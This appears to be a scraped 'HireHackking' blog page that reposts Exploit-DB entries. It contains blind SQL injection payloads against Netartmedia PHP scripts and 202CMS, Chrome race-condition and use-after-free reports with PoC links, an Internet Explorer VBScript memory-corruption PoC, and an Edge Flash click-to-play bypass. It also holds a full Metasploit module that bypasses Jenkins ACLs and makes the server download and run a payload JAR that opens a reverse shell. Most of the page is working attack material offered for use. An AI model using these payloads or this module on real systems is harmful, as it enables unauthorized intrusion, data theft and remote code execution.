Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863591798

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
# Exploit Title: Netartmedia PHP Mall 4.1 - Multiple SQL Injection
# Date: 19.03.2019
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://www.netartmedia.net/mall/
# Demo Site: https://www.phpscriptdemos.com/mall/
# Version: 4.1
# Tested on: Kali Linux
# CVE: N/A
# Description: PHP Mall is one of the first multi-stores and multi-vendors
php scripts (offered since 2006) and successfully used on many websites
today.

----- PoC 1 : SQLi (time-based blind) -----
# Request: http://localhost/[PATH]/index.php
# Parameter: id (GET)
# Payload: id=1 AND SLEEP(5)&item=&lang=en&mod=details

----- PoC 2 : SQLi (time-based blind) ----
# Request: http://localhost/[PATH]/loginaction.php
# Parameter: Email (POST)
# Payload: Email=0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z' OR SLEEP(5)
AND 'tOoX'='tOoX&Password=g00dPa$$w0rD&lang=en
HireHackking 
There appears to be a race condition in the destruction of the ExtensionsGuestViewMessageFilter if the ProcessIdToFilterMap is modified concurrently.

See the comment in the code:

ExtensionsGuestViewMessageFilter::~ExtensionsGuestViewMessageFilter() {
  DCHECK_CURRENTLY_ON(BrowserThread::IO);
  // This map is created and accessed on the UI thread. Remove the reference to
  // |this| here so that it will not be accessed again; but leave erasing the
  // key from the global map to UI thread to avoid races when accessing the
  // underlying data structure (https:/crbug.com/869791).
  (*GetProcessIdToFilterMap())[render_process_id_] = nullptr;
  base::PostTaskWithTraits(
      FROM_HERE, BrowserThread::UI,
      base::BindOnce(RemoveProcessIdFromGlobalMap, render_process_id_));
}

This comment doesn't describe behaviour that appears to be safe to me - there's no explicit mention of the safety of concurrent modification of base::flat_map; but it is noted that iterators are invalidated on insertion/erase, so as there is no further synchronisation, it doesn't appear that it is safe to read or write from this map if another thread may be concurrently modifying it.

This issue was detected by TSAN during fuzzing; but I don't think the behaviour is related to the fuzz case - it's just a dormant issue that was caught. I've attached the TSAN splat that resulted, but I don't have a reliable testcase to reproduce this issue.

This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available (whichever is earlier), the bug
report will become visible to the public.

 Ah, you can reproduce this quite easily without even having a compromised renderer. Before I submitted the report to Chrome I thought I should try just spawning lots of renderers, and that repros fairly quickly - still the same (benign, I think) race that's occuring, but that's unsurprising since the renderers in this case aren't doing anything. The attached testcase triggers in < 5 min with a TSAN build.

The testcase assumes that the domains test0.com - test63.com all resolve to your local server.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46566.zip
HireHackking 
There's a race condition in the destruction of the BindingState for bindings to the StoragePartitionService.

It looks like the root cause of the issue is that since we can get two concurrent calls to callbacks returned from mojo::BindingSet::GetBadMessageCallback() from the same BindingSet, which results in a data race destroying the same BindingState.

One case where this can be called is in a synchronous context when validating a received message, or when tearing down the connection. The other context is the callback passed to OpenSessionStorage here

https://cs.chromium.org/chromium/src/content/browser/storage_partition_impl.cc?rcl=59d4c1b34bfde4fbc31f7a40ab7d0e7df58ffd67&l=912

This is then posted to the mojo task runner thread here:

https://cs.chromium.org/chromium/src/content/browser/dom_storage/dom_storage_context_wrapper.cc?rcl=59d4c1b34bfde4fbc31f7a40ab7d0e7df58ffd67&l=433

And can be called on this thread directly here:

https://cs.chromium.org/chromium/src/content/browser/dom_storage/session_storage_context_mojo.cc?rcl=59d4c1b34bfde4fbc31f7a40ab7d0e7df58ffd67&l=140

Since this is a tight race, the repro is not terribly reliable. Opening multiple tabs at once will increase your chances of reproducing to the point where the issue triggers around 50% of the time (on my machine, mileage will vary depending on system load etc...). I found the most convenient way to reproduce was to use a ThreadSanitizer build, but since the most common result is a double-free, this will often crash a normal release build when the freelist corruption is detected.

$ python ./copy_mojo_js_bindings.py /path/to/chrome/.../out/Asan/gen
$ python -m SimpleHTTPServer&
$ /ssd/chrome_trunk/src/out/Tsan/chrome --enable-blink-features=MojoJS
--no-sandbox --user-data-dir=/tmp/aa 'http://localhost:8000/index.html' 'http://localhost:8000/index.html' 'http://localhost:8000/index.html' 'http://localhost:8000/index.html' 'http://localhost:8000/index.html' 'http://localhost:8000/index.html' 'http://localhost:8000/index.html' 'http://localhost:8000/index.html'


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46565.zip
HireHackking 
<!--
There is an issue in VBScript in the VbsErase function. In some cases (see the attached PoC), VbsErase fails to clear the argument variable properly, which can trivially lead to crafting a variable with the array type, but with a pointer controlled controlled by an attacker. This issue was most likely introduced in an attempt to fix a previously reported issue in VbsErase (https://bugs.chromium.org/p/project-zero/issues/detail?id=1668).

Debug log (Note: this was tested on Windows 10 64-bit v1809 with the most recent patches applied):

(25b4.efc): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
VBSCRIPT!VbsErase+0x5a:
6e0fc9fa 8b3e            mov     edi,dword ptr [esi]  ds:002b:13371337=????????

0:009:x86> r
eax=0000600c ebx=05dc10dc ecx=00000000 edx=00000000 esi=13371337 edi=05c5ca44
eip=6e0fc9fa esp=05c5ca28 ebp=05c5ca48 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
VBSCRIPT!VbsErase+0x5a:
6e0fc9fa 8b3e            mov     edi,dword ptr [esi]  ds:002b:13371337=????????

0:009:x86> k
 # ChildEBP RetAddr  
00 05c5ca48 6e0beac7 VBSCRIPT!VbsErase+0x5a
01 05c5ca64 6e0b9d64 VBSCRIPT!StaticEntryPoint::Call+0x37
02 05c5cb9c 6e0b8297 VBSCRIPT!CScriptRuntime::RunNoEH+0xc94
03 05c5cbec 6e0b81b5 VBSCRIPT!CScriptRuntime::Run+0xc7
04 05c5ccfc 6e0b354d VBSCRIPT!CScriptEntryPoint::Call+0xe5
05 05c5cd90 6e0ae175 VBSCRIPT!CSession::Execute+0x52d
06 05c5cdd8 6e0c0638 VBSCRIPT!COleScript::ExecutePendingScripts+0x14a
07 05c5ce6c 6e0c03e9 VBSCRIPT!COleScript::ParseScriptTextCore+0x24b
08 05c5ce98 7053ff31 VBSCRIPT!COleScript::ParseScriptText+0x29
09 05c5ced0 7053f847 MSHTML!CActiveScriptHolder::ParseScriptText+0x51
0a 05c5cf40 7053ee02 MSHTML!CScriptCollection::ParseScriptText+0x182
0b 05c5d02c 7053f50e MSHTML!CScriptData::CommitCode+0x312
0c 05c5d0a8 7053e35a MSHTML!CScriptData::Execute+0x1ba
0d 05c5d0c8 7053c526 MSHTML!CHtmScriptParseCtx::Execute+0xaa
0e 05c5d11c 70635a4c MSHTML!CHtmParseBase::Execute+0x186
0f 05c5d13c 70635319 MSHTML!CHtmPost::Broadcast+0x14c
10 05c5d264 7060b4dd MSHTML!CHtmPost::Exec+0x339
11 05c5d284 7060b3d6 MSHTML!CHtmPost::Run+0x3d
12 05c5d2a4 7060b368 MSHTML!PostManExecute+0x60
13 05c5d2b8 7060b2d9 MSHTML!PostManResume+0x6f
14 05c5d2e8 70596767 MSHTML!CHtmPost::OnDwnChanCallback+0x39
15 05c5d300 70637b9b MSHTML!CDwnChan::OnMethodCall+0x27
16 05c5d37c 706381b3 MSHTML!GlobalWndOnMethodCall+0x1cb
17 05c5d3cc 75dc635b MSHTML!GlobalWndProc+0x1f3
18 05c5d3f8 75db729c USER32!_InternalCallWinProc+0x2b
19 05c5d4dc 75db63db USER32!UserCallWinProcCheckWow+0x3ac
1a 05c5d550 75db61b0 USER32!DispatchMessageWorker+0x21b
1b 05c5d55c 71a41e05 USER32!DispatchMessageW+0x10
1c 05c5f6e0 71a413b3 IEFRAME!CTabWindow::_TabWindowThreadProc+0x435
1d 05c5f7a0 724bdf6c IEFRAME!LCIETab_ThreadProc+0x403
1e 05c5f7b8 715b24bd msIso!_IsoThreadProc_WrapperToReleaseScope+0x1c
1f 05c5f7f0 75fdfe09 IEShims!NS_CreateThread::AutomationIE_ThreadProc+0x8d
20 05c5f800 77ab662d KERNEL32!BaseThreadInitThunk+0x19
21 05c5f85c 77ab65fd ntdll_77a50000!__RtlUserThreadStart+0x2f
22 05c5f86c 00000000 ntdll_77a50000!_RtlUserThreadStart+0x1b
-->


<!-- saved from url=(0016)http://localhost -->
<meta http-equiv="x-ua-compatible" content="IE=10">
<script type="text/vbscript">

Class class5
  Private Sub Class_Terminate()
var4 = &h13371337
ReDim var4(10000000000)
  End Sub
End Class

On Error Resume Next
msgbox "start"
Dim var4(10)
set var4(1) = new class5
Erase var4
Erase var4

</script>
HireHackking 
Attached is a PoC file that bypasses Flash click2play in Microsoft Edge. This was tested on Windows 10 64bit v 1809 with the latest patches applied. The PoC currently loads a swf from wwwimages.adobe.com (screenshot attached), but can load a swf from any domain and also the PoC itself can be hosted on any domain. Note that there is a race condition wrt displaying the loaded Flash object, so if you run the PoC and don't see anything after several seconds, please refresh the page or load the PoC again. However, it worked pretty reliably in my experiments.

To see how it works, let's first examine the CObjectElement::FinalCreateObject, which gets called eventually after a new <object> element is created. The code relevant for this vulnerability is:

int CObjectElement::FinalCreateObject(...) {
  CLSID clsid;
  ...
  RetrieveClassidAndData(..., &clsid, ...)
  ...
  if(!COleSite::AllowCreate(this, clsid, ...)) {
    OnFailToCreate();
    return 0x80070005;
  }
  ...
  if(clsid == CLSID_MacromediaSwFlash && CDOMPluginArray::IsFlashCreateable(...)) {
    ...
    CView::AddPendingSizeDeterminationOleSite(...)
  } else {
    COleSite::CreateObject(this, clsid);
  }
  ...
}

Looking at the line

if(clsid == CLSID_MacromediaSwFlash && CDOMPluginArray::IsFlashCreateable(...))

you can see that if clsid is Flash clsid and if IsFlashCreateable() returns true, the Flash object will be loaded at a later time. This happens in COleSite::ProcessObjectAfterSizeDetermined after checking if either the user explicitly allowed Flash for this site, or if the site is "trusted by platform". This is how Flash objects are normally loaded.

However, in the opposite case, if clsid != CLSID_MacromediaSwFlash *or* if IsFlashCreateable() returns false (regardless of the clsid), COleSite::CreateObject is called, which creates the object immediately without performing any additional checks. Essentially the logic here in case of clsid == CLSID_MacromediaSwFlash is "If Flash isn't creatable, create the Flash object anyway", which is a bit strange and which is what the PoC exploits.

However, exercising this path is not trivial because of the earlier AllowCreate() check. AllowCreate() and IsFlashCreateable() perform very similar checks - they both eventually call COleSite::AllowCreateSecurityChecks. This means that in most of the cases where IsFlashCreateable() returns false, AllowCreate() returns false as well.

In most cases, but not all :-)

Specifically, in COleSite::AllowCreate, if the current <object> element does not have an associated Markup (is not a part of any element tree), then AllowCreate() calls COleSite::AllowCreateSecurityChecks() with the 4th argument set to 0. This has the effect that most checks will be skipped and AllowCreate() will return true (almost) always.

Now we just need to make CDOMPluginArray::IsFlashCreateable return false, and in the PoC this is done by making the associated document of the current <object> element a "dynamic" document.

This way, COleSite::CreateObject is called without click2play checks.

However, if we leave a PoC at this stage, there is going to be a (non-fatal) exception in communication between the Content Process and the Plugin Process. I'm not sure if this happens before or after the Flash object is actually loaded. In any case, we can avoid this by quickly putting the <object> element into a "normal" document tree. This also causes the Flash object to be shown on the page normally, for a dramatic effect :-)

Please also note that most of the logic shown above for CObjectElement::FinalCreateObject is also present in CPluginSite::FinishCreateObject, which is used for handling for example <embed> elements. While the current PoC does not work on <embed> elements as is, it might be possible to make it work with some modifications. So, when fixing CObjectElement::FinalCreateObject, please remember to also address CPluginSite::FinishCreateObject.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46569.zip
HireHackking 
<!--
Windows: Windows: IE11 VBScript execution policy bypass in MSHTML
Platform: Windows 10 1809 (not tested earlier)
Class: Security Feature Bypass

Summary:
MSHTML only checks for the CLSID associated with VBScript when blocking in the Internet Zone, but doesn’t check other VBScript CLSIDs which allow a web page to bypass the security zone policy.

Description:
According to https://blogs.windows.com/msedgedev/2017/07/07/update-disabling-vbscript-internet-explorer-11/, Starting from Windows 10 Fall Creators Update, VBScript execution in IE 11 should be disabled for websites in the Internet Zone and the Restricted Sites Zone by default.

The check for the VBScript security zone policy is done in MSHTML!AllowVBScript which is only called from MSHTML!CScriptCollection::GetHolderCLSID if the script language CLSID matches {b54f3741-5b07-11cf-a4b0-00aa004a55e8}. However, IE still supports the old VBScript.Encode language which has a slightly different CLSID of {b54f3743-5b07-11cf-a4b0-00aa004a55e8}. Therefore to bypass the VBScript zone security policy it’s possible to just change the language attribute in the HTML from “VBScript” to “VBScript.Encode”. To add insult to injury you don’t even need to encode the VBScript as if the engine detects the script is not encoded it tries to parse it as unencoded script.

Proof of Concept:

I’ve provided a PoC as a HTML file with a meta tag to force IE5 compatibility. Just host on an HTTP server.

1) Browse IE11 to the PoC on the web server.

Expected Result:
No VBScript is executed.

Observed Result:
VBScript is executed and a message box is displayed.
-->

<html>
<head>
<meta http-equiv="x-ua-compatible" content="IE=5">
</head>
<body>
<script language="VBScript.Encode">
MsgBox "Hello"
</script>
</body>
</html>
HireHackking 
MidiManagerWin uses a similar instance_id mechanism to the TaskService implementation to ensure that delayed tasks are only executed if the MidiManager instance that they were scheduled on is still alive. 

However, this instance_id is an int, and there is no check that it hasn't overflowed, unlike in the linux and mac implementations (MidiManagerAlsa), see https://cs.chromium.org/chromium/src/media/midi/midi_manager_alsa.cc?rcl=282aae73b9d2c1cbf12d3c39a8d3d2612e4b1876&l=175

This means that if (for example) a delayed sendData on a stale MidiManagerWin instance is queued up, and then the instance id is wrapped, this will trigger a use-after-free when that task triggers.

This bug would be theoretically reachable directly from javascript, but I think that since it's not possible to directly tear down a midi session using the WebMIDI api that this would require too much time to be feasible (as it would require creating a new frame for every increment). However, it can be triggered in a reasonable amount of time from a compromised renderer making direct Mojo calls.

The timing required for the resulting code is quite sensitive to changes in the order of Mojo messages being received; my original approach needed 6 months, but I have the time needed to cause the overflow down to ~4 days from a compromised renderer using the MojoJS javascript bindings.

I've attached a PoC (using the MojoJS bindings) that demonstrates the issue in a more convenient amount of time for testing if you patch the variable `static int id` in IssueNextInstanceId to a `static short`. Runtime will also be shorter if you run the PoC directly after booting; it also has to synchronise clocks with the system clock, and I haven't put any work into making that quick.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46570.zip
HireHackking 
There's a comment in FileSystemOperationRunner::BeginOperation

OperationID FileSystemOperationRunner::BeginOperation(
    std::unique_ptr<FileSystemOperation> operation) {
  OperationID id = next_operation_id_++;

  // TODO(https://crbug.com/864351): Diagnostic to determine whether OperationID
  // wrap-around is occurring in the wild.
  DCHECK(operations_.find(id) == operations_.end());

  // ! If id already in operations_, this will free operation
  operations_.emplace(id, std::move(operation));
  return id;
}

The id is an int, and it can wrap, and if it does this will cause a use-after-free in the browser process, since the normal usage of BeginOperation is the following:

OperationID FileSystemOperationRunner::Truncate(const FileSystemURL& url,
                                                int64_t length,
                                                StatusCallback callback) {
  base::File::Error error = base::File::FILE_OK;
  std::unique_ptr<FileSystemOperation> operation = base::WrapUnique(
      file_system_context_->CreateFileSystemOperation(url, &error));
  // ! take a raw pointer to the contents of the unique_ptr
  FileSystemOperation* operation_raw = operation.get();
  // ! call BeginOperation passing the move'd unique_ptr, freeing operation
  OperationID id = BeginOperation(std::move(operation));
  base::AutoReset<bool> beginning(&is_beginning_operation_, true);
  if (!operation_raw) {
    DidFinish(id, std::move(callback), error);
    return id;
  }
  PrepareForWrite(id, url);
  // ! use the raw free'd pointer here.
  operation_raw->Truncate(url, length,
                          base::BindOnce(&FileSystemOperationRunner::DidFinish,
                                         weak_ptr_, id, std::move(callback)));
  return id;
}

I think that to trigger this, you'd need either a malformed blob in the blob registry, or access to the FileWriter api, so at present this would require a compromised renderer.

I've attached two PoCs that should trigger this issue; it looks like the runtime for either approach from javascript should take ~2 days on my machine. (I'd suggest patching the OperationId typedef to short to reproduce, unless you are extremely patient).

$ python ./copy_mojo_js_bindings.py /path/to/chrome/.../out/Asan/gen
$ python -m SimpleHTTPServer&
$ /ssd/chrome_trunk/src/out/Asan/chrome --enable-blink-features=MojoJS --user-data-dir=/tmp/aa 'http://localhost:8000/id_overflow_no_filewriter.html'


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46571.zip
HireHackking 
# Exploit Title: Netartmedia PHP Real Estate Agency 4.0 - SQL Injection
# Date: 19.03.2019
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://www.netartmedia.net/propertyagency/
# Demo Site: https://www.phpscriptdemos.com/agency/
# Version: 4.0
# Tested on: Kali Linux
# CVE: N/A
# Description:PHP Real Estate Agency is a web software written in PHP
especially designed for real estate agencies to help create quickly
and launch their own websites with their listings and information on
it.
----- PoC SQLi -----

Request: http://localhost/[PATH]/index.php
Parameter: features[] (POST)
Payload: ad_type=&bathrooms=&bedrooms=&features[]=(select(0)from(select(sleep(0)))v)/*'%2B(select(0)from(select(sleep(0)))v)%2B'"%2B(select(0)from(select(sleep(0)))v)%2B"*/&field_location=1&listing_type=&location=&mod=search&only_pictures=1&order_by=date&pfield51_0=1&pfield51_1=1&pfield51_2=1&price_from=1&price_to=1&search_keyword=&search_type=search_form&size_from=1&size_to=1&type=1&zip=94102&zip_distance=94102&zip_radius=1&zip_type=1
HireHackking 
# Exploit Title: Netartmedia  PHP Car Dealer- SQL Injection
# Date: 19.03.2019
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://www.netartmedia.net/autodealer/
# Demo Site: https://www.phpscriptdemos.com/autodealer/
# Version: Lastest
# Tested on: Kali Linux
# CVE: N/A
# Description:The PHP Car Dealer script is also using a flexible
template system - the
 templates can be modified or new ones to be created in order to
completely customize the website look and feel.

----- PoC 1 SQLi -----

Request: http://localhost/[PATH]/index.php

Parameter features[] (POST)

Payload:body_style=&car_make=&car_model=1&condition=&exterior_color=&features[]=(select(0)from(select(sleep(0)))v)/*'%2B(select(0)from(select(sleep(0)))v)%2B'"%2B(select(0)from(select(sleep(0)))v)%2B"*/&fuel_type=&max_mileage=&mod=search&only_pictures=1&order_by=date&price_from=1&price_to=1&search_keyword=&search_type=search_form&transmission=&type=1&year=
HireHackking 
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote

  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::HttpServer
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Jenkins ACL Bypass and Metaprogramming RCE',
      'Description'    => %q{
        This module exploits a vulnerability in Jenkins dynamic routing to
        bypass the Overall/Read ACL and leverage Groovy metaprogramming to
        download and execute a malicious JAR file.

        The ACL bypass gadget is specific to Jenkins <= 2.137 and will not work
        on later versions of Jenkins.

        Tested against Jenkins 2.137 and Pipeline: Groovy Plugin 2.61.
      },
      'Author'         => [
        'Orange Tsai', # Discovery and PoC
        'wvu'          # Metasploit module
      ],
      'References'     => [
        ['CVE', '2019-1003000'], # Script Security
        ['CVE', '2019-1003001'], # Pipeline: Groovy
        ['CVE', '2019-1003002'], # Pipeline: Declarative
        ['EDB', '46427'],
        ['URL', 'https://jenkins.io/security/advisory/2019-01-08/'],
        ['URL', 'https://blog.orange.tw/2019/01/hacking-jenkins-part-1-play-with-dynamic-routing.html'],
        ['URL', 'https://blog.orange.tw/2019/02/abusing-meta-programming-for-unauthenticated-rce.html'],
        ['URL', 'https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc']
      ],
      'DisclosureDate' => '2019-01-08', # Public disclosure
      'License'        => MSF_LICENSE,
      'Platform'       => 'java',
      'Arch'           => ARCH_JAVA,
      'Privileged'     => false,
      'Targets'        => [
        ['Jenkins <= 2.137 (Pipeline: Groovy Plugin <= 2.61)',
          'Version'    => Gem::Version.new('2.137')
        ]
      ],
      'DefaultTarget'  => 0,
      'DefaultOptions' => {'PAYLOAD' => 'java/meterpreter/reverse_https'},
      'Notes'          => {
        'Stability'    => [CRASH_SAFE],
        'SideEffects'  => [IOC_IN_LOGS, ARTIFACTS_ON_DISK],
        'Reliability'  => [REPEATABLE_SESSION]
      },
      'Stance'         => Stance::Aggressive # Be aggressive, b-e aggressive!
    ))

    register_options([
      Opt::RPORT(8080),
      OptString.new('TARGETURI', [true, 'Base path to Jenkins', '/'])
    ])

    register_advanced_options([
      OptBool.new('ForceExploit', [false, 'Override check result', false])
    ])

    deregister_options('URIPATH')
  end

=begin
  http://jenkins.local/securityRealm/user/admin/search/index?q=[keyword]
=end
  def check
    checkcode = CheckCode::Safe

    res = send_request_cgi(
      'method'   => 'GET',
      'uri'      => go_go_gadget1('/search/index'),
      'vars_get' => {'q' => 'a'}
    )

    unless res && (version = res.headers['X-Jenkins'])
      vprint_error('Jenkins not detected')
      return CheckCode::Unknown
    end

    vprint_status("Jenkins #{version} detected")
    checkcode = CheckCode::Detected

    if Gem::Version.new(version) > target['Version']
      vprint_error("Jenkins #{version} is not a supported target")
      return CheckCode::Safe
    end

    vprint_good("Jenkins #{version} is a supported target")
    checkcode = CheckCode::Appears

    if res.body.include?('Administrator')
      vprint_good('ACL bypass successful')
      checkcode = CheckCode::Vulnerable
    else
      vprint_error('ACL bypass unsuccessful')
      return CheckCode::Safe
    end

    checkcode
  end

  def exploit
    unless check == CheckCode::Vulnerable || datastore['ForceExploit']
      fail_with(Failure::NotVulnerable, 'Set ForceExploit to override')
    end

    # NOTE: Jenkins/Groovy/Ivy uses HTTP unconditionally, so we can't use HTTPS
    # HACK: Both HttpClient and HttpServer use datastore['SSL']
    ssl = datastore['SSL']
    datastore['SSL'] = false
    start_service('Path' => '/')
    datastore['SSL'] = ssl

    print_status('Sending Jenkins and Groovy go-go-gadgets')
    send_request_cgi(
      'method'   => 'GET',
      'uri'      => go_go_gadget1,
      'vars_get' => {'value' => go_go_gadget2}
    )
  end

  #
  # Exploit methods
  #

=begin
  http://jenkins.local/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword
  ?apiUrl=http://169.254.169.254/%23
  &login=orange
  &password=tsai
=end
  def go_go_gadget1(custom_uri = nil)
    # NOTE: See CVE-2018-1000408 for why we don't want to randomize the username
    acl_bypass = normalize_uri(target_uri.path, '/securityRealm/user/admin')

    return normalize_uri(acl_bypass, custom_uri) if custom_uri

    normalize_uri(
      acl_bypass,
      '/descriptorByName',
      '/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile'
    )
  end

=begin
  http://jenkins.local/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile
  ?value=
  @GrabConfig(disableChecksums=true)%0a
  @GrabResolver(name='orange.tw', root='http://[your_host]/')%0a
  @Grab(group='tw.orange', module='poc', version='1')%0a
  import Orange;
=end
  def go_go_gadget2
    (
      <<~EOF
        @GrabConfig(disableChecksums=true)
        @GrabResolver('http://#{srvhost_addr}:#{srvport}/')
        @Grab('#{vendor}:#{app}:#{version}')
        import #{app}
      EOF
    ).strip
  end

  #
  # Payload methods
  #

  #
  # If you deviate from the following sequence, you will suffer!
  #
  # HEAD /path/to/pom.xml     -> 404
  # HEAD /path/to/payload.jar -> 200
  # GET  /path/to/payload.jar -> 200
  #
  def on_request_uri(cli, request)
    vprint_status("#{request.method} #{request.uri} requested")

    unless %w[HEAD GET].include?(request.method)
      vprint_error("Ignoring #{request.method} request")
      return
    end

    if request.method == 'HEAD'
      if request.uri != payload_uri
        vprint_error('Sending 404')
        return send_not_found(cli)
      end

      vprint_good('Sending 200')
      return send_response(cli, '')
    end

    if request.uri != payload_uri
      vprint_error('Sending bogus file')
      return send_response(cli, "#{Faker::Hacker.say_something_smart}\n")
    end

    vprint_good('Sending payload JAR')
    send_response(
      cli,
      payload_jar,
      'Content-Type' => 'application/java-archive'
    )

    # XXX: $HOME may not work in some cases
    register_dir_for_cleanup("$HOME/.groovy/grapes/#{vendor}")
  end

  def payload_jar
    jar = payload.encoded_jar

    jar.add_file("#{app}.class", exploit_class)
    jar.add_file(
      'META-INF/services/org.codehaus.groovy.plugins.Runners',
      "#{app}\n"
    )

    jar.pack
  end

=begin javac Exploit.java
  import metasploit.Payload;

  public class Exploit {
      public Exploit(){
          try {
              Payload.main(null);
          } catch (Exception e) { }

      }
  }
=end
  def exploit_class
    klass = Rex::Text.decode_base64(
      <<~EOF
        yv66vgAAADMAFQoABQAMCgANAA4HAA8HABAHABEBAAY8aW5pdD4BAAMoKVYB
        AARDb2RlAQANU3RhY2tNYXBUYWJsZQcAEAcADwwABgAHBwASDAATABQBABNq
        YXZhL2xhbmcvRXhjZXB0aW9uAQAHRXhwbG9pdAEAEGphdmEvbGFuZy9PYmpl
        Y3QBABJtZXRhc3Bsb2l0L1BheWxvYWQBAARtYWluAQAWKFtMamF2YS9sYW5n
        L1N0cmluZzspVgAhAAQABQAAAAAAAQABAAYABwABAAgAAAA3AAEAAgAAAA0q
        twABAbgAAqcABEyxAAEABAAIAAsAAwABAAkAAAAQAAL/AAsAAQcACgABBwAL
        AAAA
      EOF
    )

    # Replace length-prefixed string "Exploit" with a random one
    klass.sub(/.Exploit/, "#{[app.length].pack('C')}#{app}")
  end

  #
  # Utility methods
  #

  def payload_uri
    "/#{vendor}/#{app}/#{version}/#{app}-#{version}.jar"
  end

  def vendor
    @vendor ||= Faker::App.author.split(/[^[:alpha:]]/).join
  end

  def app
    @app ||= Faker::App.name.split(/[^[:alpha:]]/).join
  end

  def version
    @version ||= Faker::App.semantic_version
  end

end
HireHackking 
# Exploit Title: Netartmedia Php Dating Site - SQL Injection
# Date: 19.03.2019
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://www.netartmedia.net/datingsite/
# Demo Site: https://www.phpscriptdemos.com/dating/
# Version: Lastest
# Tested on: Kali Linux
# CVE: N/A
# Description: PHP Dating Site is a complete web system for creating
advanced and modern online dating websites.

 ----- PoC SQLi -----

Request: http://localhost/[PATH]/loginaction.php
Parameter: Email (POST)
Payload: Email=0'XOR(if(now()=sysdate()%2Csleep(0)%2C0))XOR'Z&Password=g00dPa%24%24w0rD&lang=en&mod=login
HireHackking 
# Exploit Title: Netartmedia Jobs Portal 6.1 - SQL Injection
# Date: 19.03.2019
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://www.netartmedia.net/jobsportal/
# Demo Site: https://www.ittjobs.com/
# Version: 6.1
# Tested on: Kali Linux
# CVE: N/A

----- PoC SQLi -----

Request: http://localhost/[PATH]/loginaction.php
Parameter: Email (POST)
Payload: Email=0'XOR(if(now()=sysdate()%2Csleep(0)%2C0))XOR'Z&Password=g00dPa%24%24w0rD&lang=en&mod=login
HireHackking 
===========================================================================================
# Exploit Title: 202CMS - 'log_user' SQL Inj.
# Dork: N/A
# Date: 20-03-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: https://sourceforge.net/projects/b202cms/
# Software Link: https://sourceforge.net/projects/b202cms/
# Version: v10 beta
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: 202CMS is small, but functionally CMS. It is based
on Twitter Bootstrap
  This CMS was built by Konrad and is powered by MySQLi and PHP. 202CMS is
highly customizable
  and extremely easy to setup. The script is not finished, but soon I'm
going to finish it.
===========================================================================================
# POC - SQLi (blind)
# Parameters : log_user
# Attack Pattern :
1+%2b+((SELECT+1+FROM+(SELECT+SLEEP(25))A))%2f*%27XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR%27%7c%22XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR%22*%2f
# POST Method : http://localhost/202cms10beta/index.php
===========================================================================================
###########################################################################################
===========================================================================================
# Exploit Title: 202CMS - 'register.php' SQL Inj.
# Dork: N/A
# Date: 20-03-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: https://sourceforge.net/projects/b202cms/
# Software Link: https://sourceforge.net/projects/b202cms/
# Version: v10 beta
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: 202CMS is small, but functionally CMS. It is based
on Twitter Bootstrap
  This CMS was built by Konrad and is powered by MySQLi and PHP. 202CMS is
highly customizable
  and extremely easy to setup. The script is not finished, but soon I'm
going to finish it.
===========================================================================================
# POC - SQLi (blind)
# Parameters : register.php, reg_user,reg_mail
# Attack Pattern :
1+%2b+((SELECT+1+FROM+(SELECT+SLEEP(25))A))%2f*%27XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR%27%7c%22XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR%22*%2f
# Attack Pattern : %27%2b((SELECT+1+FROM+(SELECT+SLEEP(25))A))%2b%27
# POST Method : http://localhost/202cms10beta/register.php
===========================================================================================
HireHackking 
# Exploit Title: Netartmedia PHP Business Directory 4.2 - SQL Injection
# Date: 19.03.2019
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://www.phpbusinessdirectory.com/
# Demo Site: https://www.bizwebdirectory.com/
# Version: 4.2
# Tested on: Kali Linux
# CVE: N/A
 ----- PoC SQLi -----

Request: http://localhost/[PATH]/USERS/loginaction.php
Parameter: Email (POST)
Payload: Email=0'XOR(if(now()=sysdate()%2Csleep(0)%2C0))XOR'Z&Password=g00dPa%24%24w0rD&lang=en&mod=login
HireHackking 
# Exploit Title: NetShareWatcher 1.5.8.0 - SEH Buffer Overflow
